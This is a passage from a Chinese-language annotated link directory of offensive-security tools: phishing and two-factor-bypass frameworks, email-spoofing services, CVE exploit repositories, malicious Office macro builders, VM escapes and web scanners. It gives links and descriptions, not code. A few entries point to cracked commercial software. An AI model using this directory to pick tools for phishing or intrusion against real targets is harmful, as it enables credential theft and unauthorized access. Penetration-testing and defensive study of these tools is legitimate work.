PY2.facebook脸书信息收集工具 - https://github.com/initstring/linkedin2username 通过Linkedin 领英获取相关公司员工列表 - https://github.com/0x09AL/raven linux下领英Linkedin information gathering tool - https://github.com/Ridter/Mailget 通过脉脉用户猜测企业邮箱 - https://verify-email.org 邮件真实性验证 - https://github.com/haccer/tweep 使用twitter API进行信息爬取查询 - https://github.com/MazenElzanaty/TwLocation PY.获取Twitter用户发推的地址 - https://github.com/vaguileradiaz/tinfoleak web界面,对twitter账户进行全面的分析 - https://github.com/x0day/Multisearch-v2 Bing、google、360、zoomeye等搜索引擎聚合搜索,可用于发现企业被搜索引擎收录的敏感资产信息 - https://github.com/n0tr00t/Sreg Sreg可对使用者通过输入email、phone、username的返回用户注册的所有互联网护照信息。 - https://github.com/SpiderLabs/social_mapper 社交媒体枚举和关联工具, 通过人脸识别关联人物侧写 - https://github.com/vysec/MaiInt 公司雇员信息收集测试工具 ### 网站克隆 - http://www.httrack.com 网站克隆镜像 - https://github.com/JonCooperWorks/judas GO.克隆网站钓鱼 ### 钓鱼框架 - https://github.com/bhdresh/SocialEngineeringPayloads 负责收集用于证书盗窃和鱼叉式网络钓鱼攻击的社交工程技巧和payloads - https://github.com/trustedsec/social-engineer-toolkit PY.TrustedSec开发的专为社交工程设计的开源渗透测试框架,支持网站克隆、邮件伪造、反弹shell等 - https://github.com/thelinuxchoice/blackeye PY.拥有facebook、instagram等三十余个钓鱼模板的一键启用工具 - https://github.com/M4cs/BlackEye-Python PY.以blackeye为基础,增加子域名模拟伪造功能 - https://github.com/gophish/gophish GO.拥有在线模板设计、发送诱骗广告等功能的钓鱼系统 - https://github.com/L4bF0x/PhishingPretexts 钓鱼模板 - https://github.com/azizaltuntas/Camelishing PY3.界面化社会工程学攻击辅助工具 - https://github.com/tatanus/SPF PY2.deefcon上的钓鱼系统 - https://github.com/MSG-maniac/mail_fishing PHP.基于thinkphp的甲方邮件钓鱼系统 - https://github.com/samyoyo/weeman 钓鱼的http服务器 - https://github.com/Raikia/FiercePhish 可以管理所有钓鱼攻击的完整钓鱼框架,允许你跟踪单独的网络钓鱼活动,定时发送电子邮件等 - https://github.com/securestate/king-phisher 可视化钓鱼活动工具包 - https://github.com/fireeye/ReelPhish 实时双因素网络钓鱼工具 - https://github.com/kgretzky/evilginx 绕过双因素验证的钓鱼框架 - https://github.com/kgretzky/evilginx2 MiTM 框架, 登录页面钓鱼, 绕过双因素认证等 - https://github.com/ustayready/CredSniper 使用Flask和Jinja2模板编写的网络钓鱼框架,支持捕获2FA令牌 - https://github.com/n0pe-sled/Postfix-Server-Setup 自动化建立一个网络钓鱼服务器 - https://github.com/fireeye/PwnAuth OAuth滥用测试检测平台 - https://github.com/jbtronics/CrookedStyleSheets php.使用CSS实现网页追踪 / 分析,用户鼠标轨迹捕捉 ### 邮件伪造 - https://emkei.cz 在线邮件伪造。多功能模拟。 - http://tool.chacuo.net/mailanonymous 在线邮件伪造 - http://ns4gov.000webhostapp.com 在线邮件伪造 - https://github.com/Dionach/PhEmail PY2.钓鱼与邮件伪造 - https://github.com/lunarca/SimpleEmailSpoofer PY.域名伪造钓鱼邮件 - https://www.jetmore.org/john/code/swaks/ PERL.基于smtp的邮箱域名伪造测试工具 ## 漏洞收集 - https://github.com/swisskyrepo/PayloadsAllTheThings Web安全/渗透测试/CTF常用脚本命令payloadsw。8K。goodjob。 - https://github.com/mudongliang/LinuxFlaw 包含linux下软件漏洞列表 - http://www.moonsec.com/post-389.html GNU BASH漏洞远程检测工具。cgi-bin/Bash Shellshock破壳漏洞CVE-2014-6271 - https://github.com/Lcys/Python_PoC py3.poc、exp快速编写模板,有众多模范版本 - https://github.com/coffeehb/Some-PoC-oR-ExP 各种漏洞poc、Exp的收集或编写 - https://github.com/CVEProject/cvelist Json格式的漏洞信息库,https://www.cvedetails.com - https://github.com/vulnersCom/getsploit PY2.仿照searchsploit通过各种数据库的官方接口进行payload的查找 - https://github.com/kkamagui/napper-for-tpm PY.针对TPM(可信平台模块是一种防篡改设备)CVE-2018-6622. CVE-2018-6622漏洞利用工具 ### 软件模板漏洞 - https://www.exploit-db.com/exploits/38847 CVE-2015-4027。Acunetix WVS 10 - Local Privilege Escalation本地提权漏洞。如何优雅的反击扫描你网站的黑客。 - https://www.exploit-db.com/exploits/39755 Acunetix WVS 10 - Remote Command Execution远程命令执行 - https://www.secpulse.com/archives/18940.html intro.Web Vulnerability Scanner 8 远程命令执行漏洞。本地使用wscript.shell组件执行命令。 - https://bbs.pediy.com/thread-195431.htm INTRO.Pwn the n00bs - Acunetix 0day。溢出攻击 - https://www.anquanke.com/post/id/176379 INTRO.蚁剑菜刀RCE。蚁剑客户端RCE挖掘过程及源码分析。Electron APP漏洞。 - https://github.com/WyAtu/CVE-2018-20250 PY.WinRAR压缩包代码执行复现与利用 - https://github.com/diafygi/webrtc-ips 利用WebRtc服务获取内外网真实IP。https://whoer.net - https://www.freebuf.com/articles/terminal/175862.html INTRO.从OpenVPN配置文件中创建反弹Shell实现用户系统控制 - https://github.com/blacknbunny/libSSH-Authentication-Bypass CVE-2018-10933,libssh服务端身份验证绕过 - https://github.com/leapsecurity/libssh-scanner CVE-2018-10933,libssh服务端身份验证绕过 - https://www.jianshu.com/p/726a3791b5b9 OpenSSH用户枚举漏洞(CVE-2018-15473) - https://github.com/mpgn/CVE-2019-0192/ Apache Solr远程命令执行漏洞 - https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2019-0227 Apache Axis 1.4 Remote Code Execution;CVE-2019-0227: Apache Axis RCE - https://www.corben.io/atlassian-crowd-rce/ JAVA.atlassian crowd,CVE-2019-11580. - https://github.com/c0d3p1ut0s/CVE-2019-12086-jackson-databind-file-read CVE-2019-12086.利用jackson进行MySQL服务器任意文件读取漏洞 - https://github.com/numirias/security/tree/master/data/2019-06-04_ace-vim-neovim intro.文本编辑器Vim/Neovim任意代码执行漏洞。修改vimrc在50行这里添加一个“set modeline” 然后esc保存退出,然后执行source ~/.vimrc让它生效。 - https://github.com/yogeshshe1ke/CVE/blob/master/2019-7690/mobaxterm_exploit.py PY.MobaTek MobaXterm Personal Edition v11.1 Build 3860窃取ssh密钥。CVE-2019-7690 - https://github.com/anbai-inc/CVE-2018-4878 Adobe Flash Exploit生成payload - https://github.com/numpy/numpy/issues/12759 科学计算框架numpy命令执行RCE漏洞 - https://github.com/petercunha/Jenkins-PreAuth-RCE-PoC jenkins远程命令执行 - https://github.com/euphrat1ca/OtherScript/blob/master/coremail_vul_check.sh coremail配置文件泄露导致用户导出/资产泄露/邮件伪造发送 - https://github.com/t0kx/exploit-CVE-2015-1427 BASH.Elasticsearch 1.4.0 < 1.4.2 Remote Code Execution exploit and vulnerable container远程命令执行 ### 浏览器漏洞工具 - https://github.com/SkyLined/LocalNetworkScanner JS.浏览器漏洞扫描网站浏览者内网信息 - https://github.com/0vercl0k/CVE-2019-9810 命令执行Firefox on Windows 64 bits. - https://github.com/exodusintel/CVE-2019-0808 JS/C++.CVE-2019-5786 and CVE-2019-0808 Chrome 72.0.3626.119 stable Windows 7 x86 exploit chain. - https://quitten.github.io/Firefox/ 利用浏览器(file:///home/user/) Bug使用钓鱼html读取客户端文件 - https://github.com/maxchehab/CSS-Keylogging Chrome扩展程序。Express服务器利用CSS的键盘记录功能 - https://github.com/evilcos/cookiehacker Chrome扩展程序。JavaScript document.cookie / Wireshark Cookie - https://github.com/lfzark/cookie-injecting-tools Chrome扩展。cookie注入工具包括注入,编辑,添加和删除cookie ### 沙盒虚拟化平台 - http://www.linux-kvm.org Linux内核虚拟化工具,支持unix/win等多种系统 - https://www.qemu.org qemu-kvm虚拟机管理工具 - https://github.com/moby/moby GO.Linux下虚拟容器docker。54k。 - https://github.com/hashicorp/vagrant RUBY.管理虚拟机。19k。 - https://www.virtualbox.org 跨平台多系统支持 - https://www.vmware.com 跨平台多系统支持。商业版 - https://www.vmware.com/products/esxi-and-esx.html ESXI虚拟化平台管理工具。商业版 - http://www.eve-ng.net UnifiedNetworking Lab统一网络实验室。基于Ubuntu深度定制。商业版 - http://eve-ng.cn EVE-NG中文网 ### 沙盒虚拟机逃逸 - https://github.com/hacksysteam/WpadEscape 利用wpad进行浏览器 sandbox沙箱逃逸 - https://github.com/unamer/vmware_escape vmware虚拟机逃逸。CVE-2017-4901,CVE-2018-6981,CVE-2018-6982 - https://github.com/MorteNoir1/virtualbox_e1000_0day VirtualBox E1000 Guest-to-Host Escape逃逸。教程 - https://bugs.chromium.org/p/project-zero/issues/detail?id=1682&desc=2 Ghostscript:基于漏洞CVE-2018-17961的-dSAFER沙盒逃逸技术 - https://github.com/Frichetten/CVE-2019-5736-PoC GO.利用通过从容器内覆盖和执行主机系统runc二进制文件来来逃逸Docker虚拟机 ### MS漏洞收集 - https://github.com/robertdavidgraham/rdpscan C. CVE-2019-0708 "BlueKeep" vulnerability.检测。msf插件 - https://github.com/nccgroup/BKScan BASH.基于rdpscan/freerdp进行0708漏洞扫描,支持NLA验证 - https://github.com/Sheisback/CVE-2019-0859-1day-Exploit/ C++.CVE-2019-0859 1day Exploit。可利用win32k.sys远程下载运行程序 - https://github.com/3gstudent/Smbtouch-Scanner PY.方程式永恒之蓝ETERNAL 445 SMB漏洞 - https://github.com/countercept/doublepulsar-detection-script PY.方程式双倍脉冲RDP漏洞 - https://github.com/smgorelik/Windows-RCE-exploits windows命令执行RCE漏洞POC样本,分为web与文件两种形式 - https://github.com/3gstudent/CVE-2017-8464-EXP CVE-2017-8464,win快捷方式远程执行漏洞 - https://github.com/Lz1y/CVE-2018-8420 Windows的msxml解析器漏洞可以通过ie或vbs执行后门 - https://github.com/Lz1y/CVE-2017-8759 .NET Framework换行符漏洞,CVE-2017-8759完美复现(另附加hta+powershell弹框闪烁解决方案)https://www.freebuf.com/vuls/147793.html - https://github.com/QuickBreach/ExchangeRelayX PY。基于FLASK.针对EWS(exchange web services)的NTLM中继攻击,提供OWA接口。 - https://github.com/blackorbird/APT_REPORT/blob/master/APT34/Jason.zip APT34针对exchange的电子邮件爆破劫持工具 - https://github.com/dafthack/MailSniper PS.用于在Microsoft Exchange环境搜索电子邮件查找特定邮件(密码、网络架构信息等)。提供分别针对OWA接口、EWS接口和ActiveSync接口的password spray(多用户轮番爆破防检测)。 - https://github.com/WyAtu/CVE-2018-8581 PY.利用Exchange普通权限邮箱账号密码,对其他用户(包括域管理员)邮箱收件箱的委托接管。Exchange SSRF 漏洞 - https://github.com/sensepost/ruler GO.通过MAPI / HTTP或RPC / HTTP协议远程与Exchange服务器进行交互,只要拥有合法的用户凭证,就可以利用Ruler执行一系列的信息侦察、定向攻击等操作。 - https://github.com/0x7556/txtdoor Windows漏洞,隐藏20年的txt后门 ### Office漏洞收集 - https://www.anquanke.com/post/id/163000 利用Excel 4.0宏躲避杀软检测的攻击技术分析 - https://github.com/BuffaloWill/oxml_xxe XXE漏洞利用 - https://thief.one/2017/06/20/1/ 浅谈XXE漏洞攻击与防御 - https://github.com/thom-s/docx-embeddedhtml-injection word2016,滥用Word联机视频特征执行恶意代码poc - https://blog.cymulate.com/abusing-microsoft-office-online-video word2016,滥用Word联机视频特征执行恶意代码介绍 - https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads 无需开启宏即可在word文档中利用DDE执行命令 - http://www.freebuf.com/articles/terminal/150285.html 无需开启宏即可在word文档中利用DDE执行命令利用 - https://github.com/Ridter/CVE-2017-11882 利用word文档RTF获取shell,https://evi1cg.me/archives/CVE_2017_11882_exp.html - https://fuping.site/2017/04/18/CVE-2017-0199漏洞复现过程 WORD RTF 文档,配合msf利用 - https://github.com/tezukanice/Office8570 利用ppsx幻灯片远程命令执行,https://github.com/rxwx/CVE-2017-8570 - https://github.com/0x09AL/CVE-2018-8174-msf 目前支持的版本是 32 位 IE 浏览器和 32 位 office。网页访问上线,浏览器关闭,shell 依然存活,http://www.freebuf.com/vuls/173727.html - http://www.4hou.com/technology/9405.html 在 Office 文档的属性中隐藏攻击载荷 - https://evi1cg.me/archives/Create_PPSX.html 构造PPSX钓鱼文件 - https://github.com/enigma0x3/Generate-Macro PowerShell.生成含有恶意宏的Microsoft Office文档 - https://github.com/mwrlabs/wePWNise 生成独立于体系结构的VBA代码,用于Office文档或模板,并自动绕过应用程序控制 - https://github.com/curi0usJack/luckystrike 基于PS.用于创建恶意的Office宏文档 - https://github.com/sevagas/macro_pack MS Office文档、VBS格式、快捷方式payload捆绑 - https://github.com/khr0x40sh/MacroShop 一组通过Office宏传递有效载荷的脚本 ### 物联网路由工控漏洞收集 - https://github.com/yassineaboukir/CVE-2018-0296 测试思科ASA路径穿越漏洞,可获取系统详细信息 - https://github.com/seclab-ucr/tcp_exploit 利用tcp漏洞使无线路由器产生隐私泄露 - https://github.com/ezelf/CVE-2018-9995_dvr_credentials CVE-2018-9995摄像头路由,Get DVR Credentials - https://github.com/marcinguy/android712-blueborne CVE-2017-0781,安卓蓝牙远程代码执行 - https://www.heibai.org/post/1395.html 奇安信技术研究院。D-Link路由器HNAP协议系列漏洞披露。DNS劫持/命令注入/配置泄露/越权访问 ### Java框架漏洞收集 - https://github.com/x41sec/slides/blob/master/2019-bsides-stuttgart/YourStackTracesAreLeakingCVEs.pdf Java服务异常信息查询敏感信息和漏洞信息列表 - https://github.com/NickstaDB/BaRMIe JAVA.枚举测试Java RMI(远程调用服务)安全 - https://github.com/joaomatosf/jexboss PY.JBoss和其他java序列化漏洞验证 - https://github.com/frohoff/ysoserial java.用于生成反序列验证利用载荷 - https://github.com/quentinhardy/jndiat JAVA.Java类名/目录接口/数据库审计检测 - https://github.com/Coalfire-Research/java-deserialization-exploits java反序列化漏洞收集。ciscoprime/jboss/jenkins/opennms/weblogic/websphere/ysoserial - https://github.com/GoSecure/break-fast-serial 借助DNS解析来检测Java反序列化漏洞工具 - https://github.com/brianwrf/hackUtils PY.Apache Shiro 1.2.4 Remote Code Execution/Jenkins CVE-2016-0792/S2-032/Joomla 1.5 - 3.4.5 - https://github.com/s1kr10s/Apache-Struts-v3 Apache-Struts漏洞利用工具 - https://github.com/euphrat1ca/CVE-2019-0232 Apache Tomcat Remote Code Execution on Windows - CGI-BIN - https://github.com/Lucifer1993/struts-scan PY.批量检测Struts命令执行漏洞,005-057。CVE-2018-11776 - https://github.com/shack2/Struts2VulsTools C#.Struts2漏洞检查工具2018版.界面。 #### Weblogic系列漏洞 - https://github.com/dr0op/WeblogicScan PY3.weblogic系列漏洞扫描。最新支持CVE-2019-2618(DeploymentService接口任意文件上传),CVE-2019-2729(XML反序列化rce)检测 - https://github.com/mu0gua/VulnPOC heartbleed;cve-2019-2618 Weblogic;cve-2019-3395 Confluence - https://github.com/pyn3rd/CVE-2018-3245 weblogic cve-2018-2893与cve-2018-3245远程代码命令执行 - https://github.com/jas502n/CVE-2018-3191 Weblogic CVE-2018-3191远程代码命令执行 - https://github.com/TopScrew/CVE-2019-2725 wls9_async_response.war 和 wls-wsat.war组件无身份认证授权远程RCE漏洞。命令回显+webshell上传+绕过 - https://github.com/jas502n/CNVD-C-2019-48814 Weblogic wls9_async_response 反序列化利用工具。cve-2017-10271/CNVD-C-2019-48814/CNNVD-201904-961 ## 网站扫描器漏洞检测 - https://www.acunetix.com/web-vulnerability-scanner/ Acunetix WVS扫描器,AWVS支持win/Linux。商业版,有补丁 - https://www.tenable.com/downloads/nessus 商业版漏洞扫描器,系统漏洞检测功能突出。商业版,有Nessus无IP限制版虚拟机 - https://www.ibm.com/us-en/marketplace/appscan-standard IBM漏洞扫描器,重剑无锋。商业版,有补丁 - https://github.com/andresriancho/w3af PY.包含 200+ Web漏洞 - https://github.com/gyoisamurai/GyoiThon PY.使用深度学习的渗透测试工具, 从每次扫描数据中学习, 扫描越多, 软件检测精准度越高 - https://github.com/iSafeBlue/TrackRay JAVA.溯光是一个开源的插件化渗透测试框架,框架自身实现了漏洞扫描功能,并集成了知名安全工具:Metasploit、Nmap、Sqlmap、AWVS 等,支持插件编写。 - https://github.com/TideSec/WDScanner PHP.TideSec开源分布式web漏洞扫描、客户管理、漏洞定期扫描、子域名枚举、端口扫描、网站爬虫、暗链检测、坏链检测、网站指纹搜集、专项漏洞检测、代理搜集及部署等功能。 - https://github.com/w-digital-scanner/w12scan py3.django + elasticsearch + redis(去重+web与client通信中间件)网络资产发现引擎,通过WEB API下发任务 - https://github.com/boy-hack/w9scan PY.下内置1200+插件可对网站进行一次规模的检测 - https://www.52pojie.cn/thread-134667-1-1.html Safe3 Web漏洞扫描系统企业版v10.1 破解版 Crack By Lkou[LCG].历史感。 - https://github.com/euphrat1ca/polar-scan 易语言.北极熊扫描器。历史感。 - https://github.com/euphrat1ca/yeezy-scan 椰树1.9扫描器。历史感。 - https://github.com/euphrat1ca/WebCruiserWVS C#.轻量扫描器,椰树前身 - https://github.com/theInfectedDrake/TIDoS-Framework 覆盖从侦察到漏洞分析的所有内容 - https://github.com/Tuhinshubhra/RED_HAWK php.集成信息收集、漏洞扫描、指纹识别等的扫描工具 - https://github.com/1N3/Sn1per PHP.自动化中间件扫描以及设备指纹识别 - https://github.com/m4ll0k/Spaghetti web应用扫描器,支持指纹识别、文件目录爆破、SQL/XSS/RFI等漏洞扫描,也可直接用于struts、ShellShock等漏洞扫描 - https://github.com/blackye/lalascan 集合owasp top10漏洞扫描和边界资产发现能力的分布式web漏洞扫描框架 - https://github.com/Skycrab/leakScan web界面,漏洞扫描 - https://github.com/az0ne/AZScanner web界面,自动漏洞扫描器,子域名爆破,端口扫描,目录爆破,常用框架漏洞检测 - https://github.com/MiniSafe/microweb web界面,base bugscan,django - https://github.com/taipan-scanner/Taipan web界面,基于F#与C#的安全扫描器 - https://github.com/zhangzhenfeng/AnyScan web界面,python漏洞扫描器,NoUpdate - https://github.com/Canbing007/wukong-agent web界面,python漏洞扫描器 - https://github.com/dermotblair/webvulscan web界面,php,漏洞扫描器,支持输出pdf报告 - https://github.com/0xInfection/TIDoS-Framework PY.linux,网站扫描器 - https://github.com/secdec/adapt PY.linux,网站扫描器 - https://github.com/sullo/nikto PERL.linux下网站扫描器 - https://github.com/Ekultek/Zeus-Scanner PY.搜索引擎API/代理/路径爆破/sqli/xss/ByPass。simple,web扫描器 - https://github.com/jeffzh3ng/InsectsAwake PY.web界面,基于 Flask 应用框架的漏洞扫描系统,同时集成了渗透测试常用的端口扫描、子域名爆破等功能,后端漏洞扫描采用Pocsuite - https://github.com/blackye/BkScanner 分布式、插件化web漏洞扫描器 - https://github.com/tlkh/prowler 一款基于Raspberry Pi Cluster 的网络漏洞扫描工具 - https://github.com/v3n0m-Scanner/V3n0M-Scanner 支持检测SQLi/XSS/LFI/RFI等漏洞的扫描器 - https://github.com/RASSec/pentestEr_Fully-automatic-scanner 定向自动测试工具 - https://github.com/Fireflyi/lcyscan PY.插件化漏洞扫描器,支持生成报表 - https://github.com/Arachni/arachni Web应用漏洞扫描框架,支持REST、RPC等api调用 - https://github.com/swisskyrepo/DamnWebScanner 基于chrome/opera插件的被动式漏洞扫描 - https://github.com/0xsauby/yasuo RUBY.扫描主机第三方web应用服务漏洞 - https://github.com/yangbh/Hammer Web应用漏洞扫描 - https://github.com/viraintel/OWASP-Nettacker 自动化渗透测试框架 - https://github.com/flipkart-incubator/watchdog web扫描器与漏洞利用工具 - https://github.com/Fplyth0ner-Combie/Bug-Project-Framework 易语言,模仿msf的漏洞框架,自带exp编辑器 - https://github.com/PowerScript/KatanaFramework PY.模仿msf的漏洞框架,还有些ssh、压缩包破解工具 - https://github.com/m4ll0k/Galileo PY2.网站扫描器 - https://github.com/samhaxr/hackbox PY2.simple,网站扫描器 - https://github.com/secrary/EllaScanner PY3.simple,被动式漏洞扫描,支持历史cve编号漏洞识别 - https://github.com/m4ll0k/WAScan PY.simple,扫描页面/链接/脚本/Form, 测试Payload等 - https://github.com/jiangsir404/S7scan PY.DONE,简单扫描工具 - https://github.com/hatRiot/clusterd PY.simple,web漏洞扫描利用 - https://github.com/M4cs/BabySploit PY.simple,模仿msf - https://github.com/iceyhexman/onlinetools PY3.simple,DONE,web界面,利用antsword漏洞插件 - https://github.com/tulpar/tulpar PY.支持多种web漏洞扫描.simple - https://github.com/UltimateHackers/Striker PY.信息收集、cms利用与漏扫,侦察绕过Cloudflare.SIMPLE - https://github.com/0x4D31/salt-scanner PY.基于Salt Open以及Vulners Linux Audit API的linux下扫描器,支持与JIRA、slack平台结合使用 ### 漏洞测试框架 - http://www.exploitpack.com JAVA.渗透测试集成框架,包含超过38,000+ exploits.商业版。REMOVE - https://github.com/knownsec/pocsuite3 PY3.Pocsuite知道创宇维护的一个规范化POC/EXP利用框架.2K.GOODJOB. - https://github.com/opensec-cn/kunpeng GO.POC检测框架,以动态链接库的形式提供各种语言调用 - https://github.com/Lucifer1993/AngelSword PY3.插件式漏洞识别,包含300+系统、Web、工控等漏洞poc。G:POC-T;G:btScan;G:osprey;G:pocscan;G:TangScan;G:Beebeeto-framework。 ### 被动扫描代理抓包 - https://www.0daydown.com/03/33647.html IEInspector HTTP Analyzer,可以注入进程进行SSL解密 - http://soft.125.la 精易助手,包括抓包发包正则调试等工具 - https://www.getpostman.com Chrome插件,http调试工具 - https://github.com/jakubroztocil/httpie http调试工具,类似curl,功能更完善 - https://github.com/zaproxy/zaproxy JAVA.The OWASP ZAP core project出品的综合性渗透测试工具。支持流量代理、请求重放和可扩展性,拿来做模糊测试未尝不可。greatjob。6k。 - https://github.com/x-Ai/BurpUnlimitedre burpsuite 1.7.27的永久破解版。 - https://github.com/netxfly/passive_scan PY2.基于Tornado服务的http代理web漏洞扫描器 - https://github.com/cloudtracer/paskto js.基于Nikto扫描规则的被动式路径扫描以及信息爬虫 - https://github.com/chaitin/xray 洞鉴扫描引擎社区版。主动扫描、被动代理,sql、命令注入、重定向、路径遍历,插件化配置 - https://github.com/netxfly/Transparent-Proxy-Scanner GO.基于vpn和透明代理的web漏洞扫描器,存储数据为mongodb ### 资产管理与风险测试 - https://gobies.org/updates.html 内网资产管理(端口、协议、标题、漏洞)检测。商业版 - https://github.com/mitre/caldera mitre公司模拟攻击测试系统,主要针对win。 - https://github.com/guardicore/monkey C2架构,利用默认口令与exp对ssh、smb等多种协议方式进行攻击检测 - https://github.com/jeffzh3ng/Fuxi-Scanner PY.资产管理,漏洞检测集成awvs、创宇Pocsuite、nmap、hydra - https://github.com/infobyte/faraday 协作渗透测试和漏洞管理平台,集成多种 - https://github.com/DefectDojo/django-DefectDojo 基于django的漏洞资产管理平台 - https://github.com/creditease-sec/insight web界面。宜信安全部开发,集成应用系统资产管理、漏洞全生命周期管理、安全知识库管理三位一体的管理平台 - https://github.com/RASSec/A_Scan_Framework 漏洞管理、资产管理、任务扫描系统 - https://github.com/cea-sec/ivre PY.网络资产指纹发现,bro/argus/nfdump/p0f/nmap/zmap/masscan/数据库mongoDB。shodan;zoomeye;G:Scan-T. - https://github.com/ysrc/xunfeng PY.web界面,同程安全开发的网络资产识别引擎,漏洞检测引擎。goodjob。2k。 - https://github.com/lawrenceamer/0xsp-Mongoose PHP.CS架构资产安全检测工具,汇集多种redteam toolkit。 - https://github.com/zhaoweiho/SecurityManageFramwork PY3.SecurityManageFramwork-SeMF基于django2,包含资产管理,漏洞管理,账号管理,知识库管、安全扫描自动化功能模块,可用于企业内部的安全管理。 - https://github.com/grayddq/PublicMonitors PY.对公网IP列表进行端口服务扫描,发现周期内的端口服务变化情况和弱口令安全风险。一个人的安全部 - https://github.com/grayddq/PubilcAssetInfo PY.主要目标是以甲方安全人员的视角,尽可能收集发现企业的域名和服务器公网IP资产。如百度云、阿里云、腾讯云等。一个人的安全部 - https://github.com/ywolf/F-NAScan PY2.网络资产、端口服务搜集整理,生成报表显示。快速 - https://github.com/flipkart-incubator/RTA PY.扫描公司内部所有在线设备, 提供整体安全视图, 标示所有安全异常 - https://github.com/0xbug/Biu-framework PY.企业内网基础服务安全扫描框架 ### 端口服务发现指纹识别 - https://github.com/nmap/nmap LUA.Nmap端口扫描器具有有强大的脚本引擎框架.greatjob. - https://github.com/robertdavidgraham/masscan C.无状态扫描,可以调用nmap进行指纹识别 - https://github.com/zmap/zmap C.无状态扫描,需要用C编写扩展模块 - https://github.com/chichou/grab.js JS.类似 zgrab 的快速 TCP 指纹抓取解析工具,支持更多协议 - https://github.com/OffensivePython/Nscan 基于Masscan和Zmap的网络扫描器 - https://github.com/RASSec/RASscan 端口服务扫描 - https://github.com/angryip/ipscan Angry IP Scanner。跨平台界面化端口扫描器 - http://www.advanced-ip-scanner.com Advanced IP Scanner Portable端口扫描器。商业版。 - https://github.com/AliasIO/Wappalyzer JS.网站指纹识别。资产库,Chrome扩展。5k。 - https://github.com/Lucifer1993/cmsprint json格式CMS和中间件指纹库 - https://github.com/HA71/WhatCMS bash.CMS检测和漏洞利用脚本,基于Whatcms.org API - https://github.com/urbanadventurer/whatweb RUBY.web指纹识别。2k。goodjob。 - https://github.com/l3m0n/whatweb GO.网站指纹识别,Wappalyzer资产库。 - https://github.com/Rvn0xsy/FastWhatWebSearch whatweb工具结果搜索平台 - https://github.com/boy-hack/gwhatweb PY.CMS识别,gevent多线程实现 - https://github.com/zerokeeper/WebEye PY.快速识别WEB服务器类型、CMS类型、WAF类型、WHOIS信息、以及语言框架 - https://github.com/n4xh4ck5/CMSsc4n PY.CMS指纹识别 - https://github.com/Ms0x0/Dayu JAVA.指纹识别工具 - https://github.com/0xbug/Howl 网络设备 web 服务指纹扫描与检索 - https://github.com/jekyc/wig web应用信息收集工具 - https://github.com/tanjiti/FingerPrint web应用指纹识别 - https://github.com/nanshihui/Scan-T 网络爬虫式指纹识别 - https://github.com/s0md3v/Arjun PY3.HTTP参数信息挖掘工具。simple。 - https://github.com/mozilla/ssh_scan 服务器ssh配置信息扫描 - https://github.com/mozilla/cipherscan 目标主机服务ssl类型识别 - https://github.com/rbsec/sslscan ssl类型识别 - https://github.com/ywolf/F-MiddlewareScan 中间件扫描服务识别 - https://github.com/ggusoft/inforfinder 域名资产收集及指纹识别工具 - https://github.com/EnableSecurity/wafw00f WAF产品指纹识别 ### Web漏洞工具CMS利用 - https://github.com/SecWiki/CMS-Hunter CMS漏洞测试用例集合 - https://github.com/Mr5m1th/0day 各种开源CMS 各种版本的漏洞以及EXP - https://github.com/w1109790800/penetration CMS新老版本exp与系统漏洞搜集表 - https://github.com/anx1ang/Poc_Pentest web_cms_exp - https://github.com/CHYbeta/cmsPoc CMS渗透测试框架 - https://github.com/chuhades/CMS-Exploit-Framework CMS攻击框架 - https://github.com/Tuhinshubhra/CMSeeK 20多种CMS的基本检测,针对wp利用、可定制模块化爆破功能 - https://github.com/Moham3dRiahi/XAttacker Web CMS Exploit 工具,包含针对主流 CMS 的 66 个不同的 Exploits - https://github.com/jas502n/CVE-2019-6340 Drupal8's REST RCE, SA-CORE-2019-003, CVE-2019-6340 - https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection thinkphp v5.x 远程代码执行漏洞-POC集合 - https://github.com/ajinabraham/NodeJsScan PY.NodeJS应用安全测试审计,查询可利用接口,WebUI。goodjob. - https://github.com/wpscanteam/wpscan RUBY.wordpress漏洞扫描工具 - https://github.com/swisskyrepo/Wordpresscan 基于WPScan以及WPSeku的优化版wordpress扫描器 - https://github.com/m4ll0k/WPSeku 精简的wordpress扫描工具 - https://github.com/rastating/wordpress-exploit-framework wordpress漏洞框架 - https://github.com/Jamalc0m/wphunter php.wordpress扫描器 - https://github.com/UltimateLabs/Zoom wordpress漏洞扫描器 - https://github.com/Dionach/CMSmap 支持WordPress,Joomla和Drupal扫描 - https://github.com/immunIT/drupwn Drupal 信息收集与漏洞利用工具 - https://github.com/code-scan/dzscan 首款集成化的Discuz扫描工具 - https://github.com/lietdai/doom thorn上实现的分布式任务分发的ip端口漏洞扫描器 - https://github.com/gh0stkey/PoCBox PHP.漏洞测试验证/报告生成平台。SONP劫持、CORS、Flash跨域资源读取、Google Hack语法生成、URL测试字典生成、JavaScript URL跳转、302 URL跳转 - https://github.com/utiso/dorkbot 通过定制化的谷歌搜索引擎进行漏洞页面搜寻及扫描 - https://github.com/NullArray/DorkNet 基于搜索引擎的漏洞网页搜寻 - https://github.com/m3liot/shcheck 用于检查web服务的http header的安全性 - https://github.com/18F/domain-scan 针对域名及其子域名的资产数据检测/扫描,包括http/https检测等 - https://github.com/commixproject/commix 命令注入漏洞扫描 - https://github.com/jcesarstef/dotdotslash 目录遍历漏洞测试 - https://github.com/m101/hsploit 基于rust的 HEVD 漏洞利用程序 - https://github.com/coffeehb/SSTIF SSTI (服务器模板注入) 漏洞的半自动化工具 - https://github.com/tijme/angularjs-csti-scanner 探测客户端AngularJS模板注入漏洞工具 - https://github.com/epinna/tplmap SSTI (服务器模板注入) 漏洞检测与利用工具 - https://github.com/blackye/Jenkins Jenkins漏洞探测、用户抓取爆破 - https://github.com/irsdl/IIS-ShortName-Scanner JAVA.IIS短文件名暴力枚举漏洞利用工具 - https://github.com/lijiejie/IIS_shortname_Scanner PY2.IIS短文件名漏洞扫描 - https://github.com/jas502n/CVE-2019-7238 Nexus Repository Manager 3 Remote Code Execution without authentication < 3.15.0 - https://github.com/rudSarkar/crlf-injector CRLF注入漏洞批量扫描 - https://github.com/Bo0oM/PHP_imap_open_exploit 利用imap_open绕过php exec函数禁用 ### Web前端漏洞利用 - https://github.com/hahwul/a2sv SSL漏洞扫描,OpenSSL心脏滴血漏洞等 - https://github.com/Valve/fingerprintjs2 JS.被动式浏览器全指纹库获取。8k。goodjob。Browser Fingerprinting via OS and Hardware Level Features。 - https://github.com/Song-Li/cross_browser JS.被动式跨浏览器指纹追踪识别,支持硬件特征(显卡、cpu核数等)识别。指纹追踪技术—跨浏览器指纹识别crossbrowsertracking_NDSS17.pdf。 - 